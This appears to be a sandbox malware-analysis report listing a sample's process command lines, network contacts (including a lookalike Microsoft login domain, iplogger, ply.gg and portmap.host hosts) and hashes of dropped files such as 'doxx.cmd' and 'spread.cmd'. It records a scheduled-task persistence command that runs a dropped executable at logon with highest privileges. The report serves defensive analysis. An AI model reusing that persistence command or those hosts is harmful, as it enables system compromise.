"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,14909979360840004400,3372282537268262913,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,839320844312324912,4757314447254224790,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NnbGeaeUTLT0.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pjCRu77GHrjM.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\xcopy.exe
xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop
C:\Windows\SysWOW64\regedit.exe
regedit
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0Wc443H7jsH8.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | https-login--microsoftonline--com.httpsproxy.net | udp |
| GB | 142.250.200.19:80 | https-login--microsoftonline--com.httpsproxy.net | tcp |
| GB | 142.250.200.19:80 | https-login--microsoftonline--com.httpsproxy.net | tcp |
| US | 8.8.8.8:53 | 19.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aadcdn.msauth.net | udp |
| US | 8.8.8.8:53 | aadcdn.msftauth.net | udp |
| US | 13.107.253.65:443 | aadcdn.msauth.net | tcp |
| US | 8.8.8.8:53 | 65.253.107.13.in-addr.arpa | udp |
| US | 13.107.253.65:443 | aadcdn.msauth.net | tcp |
| US | 13.107.253.65:443 | aadcdn.msauth.net | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 13.107.253.65:443 | aadcdn.msauth.net | tcp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | privacy.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mrbeast.codes | udp |
| US | 8.8.8.8:53 | dwrapper-prod.herokuapp.com | udp |
| IE | 46.137.15.86:80 | dwrapper-prod.herokuapp.com | tcp |
| US | 8.8.8.8:53 | 86.15.137.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trustsentry.com | udp |
| US | 8.8.8.8:53 | ya.ru | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tria.ge | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 104.21.79.77:443 | yip.su | tcp |
| US | 8.8.8.8:53 | 77.79.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 216.58.204.67:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 104.18.40.144:443 | tria.ge | tcp |
| GB | 216.58.212.238:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 216.58.212.238:443 | www.youtube.com | udp |
| GB | 142.250.179.246:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.34:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 144.40.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 142.250.200.34:443 | googleads.g.doubleclick.net | udp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | tcp |
| GB | 142.250.179.230:443 | static.doubleclick.net | tcp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.178.14:443 | play.google.com | tcp |
| GB | 142.250.178.14:443 | play.google.com | tcp |
| GB | 142.250.178.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 172.67.188.178:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | having-jackson.gl.at.ply.gg | udp |
| US | 147.185.221.18:56522 | having-jackson.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 178.188.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 216.58.212.238:443 | www.youtube.com | tcp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 173.194.69.84:443 | accounts.google.com | tcp |
| US | 147.185.221.18:56522 | having-jackson.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 142.250.187.238:443 | consent.youtube.com | tcp |
| NL | 173.194.69.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.69.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| GB | 163.70.151.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | play.google.com | udp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| GB | 172.217.16.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | video-lhr6-2.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | video-lhr6-1.xx.fbcdn.net | udp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | video-lhr8-1.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | video-lhr8-2.xx.fbcdn.net | udp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | udp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 157.240.214.18:443 | video-lhr8-2.xx.fbcdn.net | tcp |
| GB | 157.240.214.18:443 | video-lhr8-2.xx.fbcdn.net | tcp |
| GB | 157.240.214.18:443 | video-lhr8-2.xx.fbcdn.net | tcp |
| GB | 157.240.221.10:443 | video-lhr8-1.xx.fbcdn.net | tcp |
| GB | 157.240.221.10:443 | video-lhr8-1.xx.fbcdn.net | tcp |
| GB | 157.240.221.10:443 | video-lhr8-1.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | scontent-lhr6-2.xx.fbcdn.net | udp |
| GB | 163.70.151.21:443 | scontent-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | scontent-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | scontent-lhr6-2.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | scontent-lhr6-1.xx.fbcdn.net | udp |
| GB | 163.70.147.23:443 | scontent-lhr6-1.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | 12.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.147.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.214.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.221.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.147.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | scontent-lhr8-2.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | scontent.xx.fbcdn.net | udp |
| GB | 157.240.214.11:443 | scontent-lhr8-2.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | 11.214.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 8.8.8.8:53 | 9.73.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 147.185.221.18:56522 | having-jackson.gl.at.ply.gg | tcp |
Files
memory/1656-0-0x00000000747DE000-0x00000000747DF000-memory.dmp
memory/1656-1-0x0000000000EA0000-0x0000000000EFE000-memory.dmp
memory/1656-2-0x0000000005730000-0x0000000005754000-memory.dmp
memory/1656-3-0x00000000747D0000-0x0000000074F80000-memory.dmp
memory/1656-4-0x0000000005DD0000-0x0000000006374000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\!main.cmd
| MD5 | 5bef4958caf537ac924b6ce01e1d1e13 |
| SHA1 | cf7a0805a98f3c16ca14c6e420e2ca44ad77a164 |
| SHA256 | e801541a9d48a9adbb720cdb5b06f9bab9b4a62f0434221876a607a7be75d28d |
| SHA512 | 9f62246e56f3461f8d180d3a4bc3ccd6187f457196b770af9c8427a3795504f6b44d2fb7a305d41d54d58e4759136426ca4f6e09771136f27d2c478aad153f99 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.pack
| MD5 | 34a66c4ec94dbdc4f84b4e6768aebf4e |
| SHA1 | d6f58b372433ad5e49a20c85466f9fb3627abff2 |
| SHA256 | fcf530e33a354ac1de143e2f87960e85f694e99d7aa652408c146e8d0a1430fb |
| SHA512 | 4db51769dcee999baf3048c793dde9ad86c76f09fc17edd8e2f1dedf91cf224ddfbe9554c4ff14659ea0f6663b054953ec2ab9d964e6e9ca44ee744e02b7e5b9 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\doxx.cmd
| MD5 | 013a01835332a3433255e3f2dd8d37d6 |
| SHA1 | 8a318cc4966eee5ebcb2c121eb4453161708f96c |
| SHA256 | 23923556f7794769015fb938687bf21c28ae5f562c4550c41d3d568ad608b99b |
| SHA512 | 12e9d439c8c558218d49415bbd27d0749f9f7a7e6c177074e11ac1a6f2185c22c4cf51f5a41133eaddf8a06288c352460d4450ad9702c4652ad259ed1260f42d |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\spread.cmd
| MD5 | 7a71a7e1d8c6edf926a0437e49ae4319 |
| SHA1 | d9b7a4f0ed4c52c9fbe8e3970140b47f4be0b5f1 |
| SHA256 | e0d127c00f9679fb359c04b6238b976f1541918a0df0d6c61f1a44e8f27846ae |
| SHA512 | 96a57412bda3f16e56398cd146ece11e3d42291dceff2aec22871a7e35e3b102b27151984ae0795ca6d5ef5385ef780906d9b13cec78cbbdf019a3de4792ca3a |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\.didata
| MD5 | 41b8ce23dd243d14beebc71771885c89 |
| SHA1 | 051c6d0acda9716869fbc453e27230d2b36d9e8f |
| SHA256 | bc86365a38e3c8472413f1656a28b04703d8c77cc50c0187ddf9d0afbb1f9bf7 |
| SHA512 | f0fb505c9f8d2699717641c3571acb83d394b0f8eee9cff80ad95060d1993f9f4d269c58eb35aae64a639054e42aaa699719b08357f7c0c057b407e2bdf775da |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\.edata
| MD5 | 37c1a5c63717831863e018c0f51dabb7 |
| SHA1 | 8aab4ebcf9c4a3faf3fc872d96709460d6bf6378 |
| SHA256 | d975b12871fc3f217b71bb314e5e9ea6340b66ece9e26a0c9cbd46de22368941 |
| SHA512 | 4cf2b8efa3c4520cc80c4d560662bddbe4071b6908d29550d59bcda94c8b80a282b5e0b4536a88331a6a507e8410ccb35f4e38d0b571960f822bda7b69e4bb19 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\.idata
| MD5 | a73d686f1e8b9bb06ec767721135e397 |
| SHA1 | 42030ea2f06f38d5495913b418e993992e512417 |
| SHA256 | a0936d30641746144eae91e37e8cbed42dc9b3ee3e5fdda8e45ad356180f0461 |
| SHA512 | 58942400f6b909e42d36187fd19d64a56b92c2343ed06f6906291195fea6fe5a79fc628cbfc7c64e09f0196cbaba83dc376985ceef305bd0a2fadaca14b5c9e5 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\.txt
| MD5 | 8f2f090acd9622c88a6a852e72f94e96 |
| SHA1 | 735078338d2c5f1b3f162ce296611076a9ddcf02 |
| SHA256 | 61da25d2beb88b55ef629fab530d506a37b56cfabfa95916c6c5091595d936e4 |
| SHA512 | b98fbb6d503267532d85bf0eb466e4e25169baefafdaaa97bdc44eaab2487419fde106626c0cc935ba59bcb4472597e23b3c21e3347ed32de53c185739735404 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\0.txt
| MD5 | c1672053cdc6d8bf43ee7ac76b4c5eee |
| SHA1 | fc1031c30cc72a12c011298db8dc9d03e1d6f75c |
| SHA256 | 1cdb267b3e66becf183e9e747ae904e8684bab519041f39f9bd0b7dd0b3c66cb |
| SHA512 | 12e64a77c5b07d1f0fe1f07a6bf01078373d99bb7372a2d8a5c44fdbf753b44381f112822c1f75475e762d85fcf806487925860941005d342473ec90f9997633 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\CERTIFICATE.cer
| MD5 | c07164d3b38ca643290adaa325e1d842 |
| SHA1 | 895841abf68668214e5c8aa0a1600ff6b88e299d |
| SHA256 | da5dd4622c1c9054dc2c01cb36d26802ffbd3345e8cf8a20a2e8d7a859251600 |
| SHA512 | 92922192fdca0b6a0a6634415fd0ccdd32087584b7b2ea0a1e550b8bf9a5c8fe79401fadc0de8d4d340ef700a01079b51529adcab576f0ca17a864748ae39118 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\data.txt
| MD5 | 4c195d5591f6d61265df08a3733de3a2 |
| SHA1 | 38d782fd98f596f5bf4963b930f946cf7fc96162 |
| SHA256 | 94346a0e38b0c2ccd03cf9429d1c1bce2562c29110bb29a9b0befc6923618146 |
| SHA512 | 10ee2e62ca1efa1cda51ca380a36dfabdd2e72cec41299369cac95fc3864ca5f4faa959f70d2b2c145430e591b1249f233b31bd78ba9ee64cf0604c887b674d7 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\_.txt
| MD5 | ad6e46e3a3acdb533eb6a077f6d065af |
| SHA1 | 595ad8ee618b5410e614c2425157fa1a449ec611 |
| SHA256 | b68ad9b352910f95e5496032eea7e00678c3b2f6b0923eb88a6975ef52daf459 |
| SHA512 | 65d1f189e905419cc0569fd7f238af4f8ba726a4ddad156345892879627d2297b2a29213ac8440756efb1d7aaead1c0858462c4d039b0327af16cbb95840a1e8 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\i.txt
| MD5 | d40fc822339d01f2abcc5493ac101c94 |
| SHA1 | 83d77b6dc9d041cc5db064da4cae1e287a80b9e6 |
| SHA256 | b28af33bc028474586bb62da7d4991ddd6f898df7719edb7b2dfce3d0ea1d8c6 |
| SHA512 | 5701c2a68f989e56e7a38e13910421c8605bc7b58ae9b87c1d15375829e100bad4ac86186f9d5670c9a5e0dd3e46f097d1d276e62d878e0c2f6eb5f6db77dd46 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\2\CODE2000.TTF
| MD5 | 052eaff1c80993c8f7dca4ff94bb83ca |
| SHA1 | 62a148210e0103b860b7c3257a18500dff86cb83 |
| SHA256 | afabc4e845085d6b4f72a9de672d752c002273b52221a10caf90d8cb03334f3c |
| SHA512 | 57209c40b55170da437ab1120b2f486d698084d7d572b14889b2184e8327010a94eee25a86c9e0156ba12ed1a680507016390f059f265cceb3aa8698e8e94764 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\2\readme.txt
| MD5 | d6b389a0317505945493b4bfc71c6d51 |
| SHA1 | a2027bc409269b90f4e33bb243adeb28f7e1e37b |
| SHA256 | d94ed2f7aa948e79e643631e0cd73cf6a221790c05b50ad1d6220965d85ac67c |
| SHA512 | 4ea3c8bdee2b9e093d511a7e4ded557f182df8d96e798cb9ee95014f3b99ebd21f889516e5f934033b01b7ca1e26f5444f2e6be0cc0d7fba0b3faa4cea40e187 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_1598.MP4
| MD5 | 808c2e1e12ddd159f91ed334725890f4 |
| SHA1 | 96522421df4eb56c6d069a29fa4e1202c54eb4e4 |
| SHA256 | 5588c6bf5b74c0a8b088787a536ef729bcedaedfc554ef317beea7fca3b392f7 |
| SHA512 | f6205b07c68f3b6abe7daf0517fbc07def4cb471bd754cd25333f5301dc9f1ac439217c6a09c875376ece4f6fb348e8b9e44e6e8a813ac5d8078cedc5b60bb3c |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_1599.MP4
| MD5 | 06947b925a582d2180ed7be2ba196377 |
| SHA1 | 34f35738fdf5c51fa28093ee06be4c12fcbd9fda |
| SHA256 | b09bd14497d3926dc3717db9a3607c3cec161cc5b73c1af7e63d9ccce982a431 |
